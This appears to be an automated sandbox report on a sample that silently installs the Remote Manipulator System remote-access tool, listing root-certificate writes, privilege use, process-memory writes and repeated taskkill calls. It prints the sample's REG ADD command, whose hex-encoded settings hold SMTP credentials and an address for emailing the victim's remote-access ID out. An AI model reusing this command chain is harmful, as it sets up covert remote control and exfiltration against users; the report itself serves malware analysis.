Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob = 5c0000000100000004000000000800000400000001000000100000008ccadc0b22cef5be72ac411a11a8d81203000000010000001400000091c6d6ee3e8ac86384e548c299295c756c817b817e000000010000000800000000c0032f2df8d6010b000000010000000e00000074006800610077007400650000001d00000001000000100000005b3b67000eeb80022e42605b6b3b72401400000001000000140000007b5b45cfafcecb7afd31921a6ab6f346eb5748506200000001000000200000008d722f81a9c113c0791df136a2966db26c950a971db46b4199f4ea54b78bfb9f53000000010000002500000030233021060b6086480186f8450107300130123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703017f000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703010f000000010000001400000085fef11b4f47fe3952f98301c9f98976fefee0ce190000000100000010000000dc73f9b71e16d51d26527d32b11a6a3d2000000001000000240400003082042030820308a0030201020210344ed55720d5edec49f42fce37db2b6d300d06092a864886f70d01010505003081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f74204341301e170d3036313131373030303030305a170d3336303731363233353935395a3081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100aca0f0fb8059d49cc7a4cf9da159730910450c0d2c6e68f16c5b4868495937fc0b3319c2777fcc102d95341ce6eb4d09a71cd2b8c9973602b789d4245f06c0cc4494948d02626feb5add118d289a5c8490107a0dbd74662f6a38a0e2d55444eb1d079f07ba6feee9fd4e0b29f53e84a001f19cabf81c7e89a4e8a1d871650da3517beebcd222600db95b9ddfbafc515b0baf98b2e92ee904e86287de2bc8d74ec14c641eddcf8758ba4a4fca68071d1c9d4ac6d52f91cc7c71721cc5c067eb32fdc9925c94da85c09bbf537d2b09f48c9d911f976a52cbde0936a477d87b875044d53e6e2969fb3949261e09a5807b402debe82785c9fe61fd7ee67c971dd59d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147b5b45cfafcecb7afd31921a6ab6f346eb574850300d06092a864886f70d010105050003820101007911c04bb391b6fcf0e967d40d6e45be55e893d2ce033fedda25b01d57cb1e3a76a04cec5076e864720ca4a9f1b88bd6d68784bb32e54111c077d9b3609deb1bd5d16e4444a9a601ec55621d77b85c8e48497c9c3b5711acad73378e2f785c906847d96060e6fc073d222017c4f716e9c4d872f9c8737cdf162f15a93efd6a27b6a1eb5aba981fd5e34d640a9d13c861baf5391c87bab8bd7b227ff6feac4079e5ac106f3d8f1b79768bc437b3211884e53600eb632099b9e9fe3304bb41c8c102f94463209e81ce42d3d63f2c76d3639c59dd8fa6e10ea02e41f72e9547cfbcfd33f3f60b617e7e912b8147c22730eea7105d378f5c392be404f07b8d568c68	rutserv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	rutserv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	rutserv.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmprutserv.exerutserv.exe

pid	process
2644	5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp
2644	5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp
2948	rutserv.exe
2948	rutserv.exe
2948	rutserv.exe
2948	rutserv.exe
2948	rutserv.exe
2948	rutserv.exe
2948	rutserv.exe
2948	rutserv.exe
2948	rutserv.exe
2948	rutserv.exe
2948	rutserv.exe
2948	rutserv.exe
2388	rutserv.exe
2388	rutserv.exe
2388	rutserv.exe
2388	rutserv.exe
2388	rutserv.exe
2388	rutserv.exe
2388	rutserv.exe
2388	rutserv.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exerutserv.exetaskkill.exesvchost.exetaskkill.exetaskkill.exerutserv.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	2128	taskkill.exe
Token: SeDebugPrivilege	640	taskkill.exe
Token: SeDebugPrivilege	2948	rutserv.exe
Token: SeDebugPrivilege	2948	rutserv.exe
Token: SeDebugPrivilege	1424	taskkill.exe
Token: SeTcbPrivilege	1644	svchost.exe
Token: SeTcbPrivilege	1644	svchost.exe
Token: SeDebugPrivilege	3520	taskkill.exe
Token: SeDebugPrivilege	3168	taskkill.exe
Token: SeTakeOwnershipPrivilege	2388	rutserv.exe
Token: SeTcbPrivilege	2388	rutserv.exe
Token: SeDebugPrivilege	1524	taskkill.exe
Token: SeDebugPrivilege	2144	taskkill.exe
Token: SeTcbPrivilege	2388	rutserv.exe
Token: SeDebugPrivilege	2452	taskkill.exe
Token: SeDebugPrivilege	1420	taskkill.exe
Token: SeDebugPrivilege	1424	taskkill.exe
Token: SeDebugPrivilege	3904	taskkill.exe
Token: SeDebugPrivilege	1832	taskkill.exe
Token: SeDebugPrivilege	1508	taskkill.exe
Token: SeDebugPrivilege	1252	taskkill.exe
Token: SeDebugPrivilege	3040	taskkill.exe
Token: SeDebugPrivilege	1832	taskkill.exe
Token: SeDebugPrivilege	1508	taskkill.exe
Token: SeDebugPrivilege	1560	taskkill.exe
Token: SeDebugPrivilege	3040	taskkill.exe
Token: SeDebugPrivilege	1832	taskkill.exe
Token: SeDebugPrivilege	1236	taskkill.exe
Token: SeDebugPrivilege	4076	taskkill.exe
Token: SeDebugPrivilege	4044	taskkill.exe
Token: SeDebugPrivilege	1236	taskkill.exe
Token: SeDebugPrivilege	4076	taskkill.exe
Token: SeDebugPrivilege	4044	taskkill.exe
Token: SeDebugPrivilege	1236	taskkill.exe
Token: SeDebugPrivilege	4012	taskkill.exe
Token: SeDebugPrivilege	4068	taskkill.exe
Token: SeDebugPrivilege	1236	taskkill.exe
Token: SeDebugPrivilege	4012	taskkill.exe
Token: SeDebugPrivilege	4068	taskkill.exe
Token: SeDebugPrivilege	1236	taskkill.exe
Token: SeDebugPrivilege	4012	taskkill.exe
Token: SeDebugPrivilege	4068	taskkill.exe
Token: SeDebugPrivilege	1236	taskkill.exe
Token: SeDebugPrivilege	4012	taskkill.exe
Token: SeDebugPrivilege	3936	taskkill.exe
Token: SeDebugPrivilege	1524	taskkill.exe
Token: SeDebugPrivilege	3980	taskkill.exe
Token: SeDebugPrivilege	1096	taskkill.exe
Token: SeDebugPrivilege	2004	taskkill.exe
Token: SeDebugPrivilege	1156	taskkill.exe
Token: SeDebugPrivilege	1508	taskkill.exe
Token: SeDebugPrivilege	3712	taskkill.exe
Token: SeDebugPrivilege	4024	taskkill.exe
Token: SeDebugPrivilege	4012	taskkill.exe
Token: SeDebugPrivilege	3168	taskkill.exe
Token: SeDebugPrivilege	1560	taskkill.exe
Token: SeDebugPrivilege	3712	taskkill.exe
Token: SeDebugPrivilege	4024	taskkill.exe
Token: SeDebugPrivilege	4012	taskkill.exe
Token: SeDebugPrivilege	3168	taskkill.exe
Token: SeDebugPrivilege	1560	taskkill.exe
Token: SeDebugPrivilege	3712	taskkill.exe
Token: SeDebugPrivilege	3488	taskkill.exe
Token: SeDebugPrivilege	3904	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp

pid process

2644 5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp
Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

rutserv.exerutserv.exe

pid process

2948 rutserv.exe
2948 rutserv.exe
2948 rutserv.exe
2948 rutserv.exe
2388 rutserv.exe
2388 rutserv.exe
2388 rutserv.exe
2388 rutserv.exe

pid	process
2948	rutserv.exe
2948	rutserv.exe
2948	rutserv.exe
2948	rutserv.exe
2388	rutserv.exe
2388	rutserv.exe
2388	rutserv.exe
2388	rutserv.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.exe5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmpcmd.exesvchost.exe

description	pid	process	target process
PID 3944 wrote to memory of 2644	3944	5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.exe	5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp
PID 3944 wrote to memory of 2644	3944	5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.exe	5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp
PID 3944 wrote to memory of 2644	3944	5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.exe	5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp
PID 2644 wrote to memory of 2008	2644	5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp	cmd.exe
PID 2644 wrote to memory of 2008	2644	5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp	cmd.exe
PID 2008 wrote to memory of 2356	2008	cmd.exe	reg.exe
PID 2008 wrote to memory of 2356	2008	cmd.exe	reg.exe
PID 2008 wrote to memory of 2452	2008	cmd.exe	timeout.exe
PID 2008 wrote to memory of 2452	2008	cmd.exe	timeout.exe
PID 2008 wrote to memory of 2948	2008	cmd.exe	rutserv.exe
PID 2008 wrote to memory of 2948	2008	cmd.exe	rutserv.exe
PID 2008 wrote to memory of 2948	2008	cmd.exe	rutserv.exe
PID 2008 wrote to memory of 2128	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 2128	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 640	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 640	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1424	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1424	2008	cmd.exe	taskkill.exe
PID 1644 wrote to memory of 2388	1644	svchost.exe	rutserv.exe
PID 1644 wrote to memory of 2388	1644	svchost.exe	rutserv.exe
PID 1644 wrote to memory of 2388	1644	svchost.exe	rutserv.exe
PID 2008 wrote to memory of 3520	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 3520	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 3168	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 3168	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1524	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1524	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 2144	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 2144	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 2452	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 2452	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1420	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1420	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1424	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1424	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 3904	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 3904	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1832	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1832	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1508	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1508	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1252	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1252	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 3040	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 3040	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1832	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1832	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1508	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1508	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1560	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1560	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 3040	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 3040	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1832	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1832	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1236	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1236	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 4076	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 4076	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 4044	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 4044	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1236	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 1236	2008	cmd.exe	taskkill.exe
PID 2008 wrote to memory of 4076	2008	cmd.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.exe
"C:\Users\Admin\AppData\Local\Temp\5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3944

C:\Users\Admin\AppData\Local\Temp\is-DUFCC.tmp\5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DUFCC.tmp\5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.tmp" /SL5="$20116,6385183,780800,C:\Users\Admin\AppData\Local\Temp\5903CA7C770EB447D3D83E9DBC28469B172D74A4E9FB5.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2644

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\ProgramData\Immunity\install.cmd""
3⤵
- Suspicious use of WriteProcessMemory
PID:2008

C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Host" /f /v "notification" /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b46383041413939302d414432332d343543432d423131352d4439383834443532373335387d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e747275653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e79616e6465782e72753c2f686f73743e3c706f72743e3538373c2f706f72743e3c757365726e616d653e736368616b75726f784079616e6465782e72753c2f757365726e616d653e3c70617373776f72643e6f4e33396a3138786771536a33654b5057444744704b76646a6f38384d66536d3c2f70617373776f72643e3c66726f6d5f656d61696c3e736368616b75726f784079616e6465782e72753c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e776577626f6f6c4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e20496e7465726e65742d494420d181d0b3d0b5d0bdd0b5d180d0b8d180d0bed0b2d0b0d0bd3a20254944253c2f7375626a6563743e3c746578743e2671756f743be2968220e2968320e2968420e2968520e29686e298a354686520636f6d7075746572e298a3e2968620e2968520e2968420e2968320e2968220202671756f743b2c2c2671756f743b49443a20254944252671756f743b2c2671756f743b557365726e616d653a2025555345524e414d45252671756f743b2c2671756f743b436f6d7075746572206e616d653a2025434f4d504e414d45252671756f743b2c2671756f743b5468652075736572207761732070726573656e7465642061733a202553454c464944252671756f743b3c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a
4⤵
PID:2356

C:\Windows\system32\timeout.exe
TIMEOUT /T 3
4⤵
- Delays execution with timeout.exe
PID:2452

C:\ProgramData\Immunity\rutserv.exe
"C:\ProgramData\Immunity\rutserv.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2948

C:\ProgramData\Immunity\rutserv.exe
C:\ProgramData\Immunity\rutserv.exe -run_agent -second
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2388

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2128

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:640

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1424

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3520

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3168

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2144

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2452

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1420

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1424

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3904

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:1832

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:1508

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1252

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:3040

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:1832

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1508

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1560

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3040

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1832

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:1236

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:4076

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:4044

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:1236

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4076

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4044

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:1236

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:4012

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:4068

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:1236

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:4012

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:4068

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
PID:1236

C:\Windows\system32\taskkill.exe
taskkill /f /im "rundll32.exe"
4⤵
- Kills process with taskkill
PID:4012

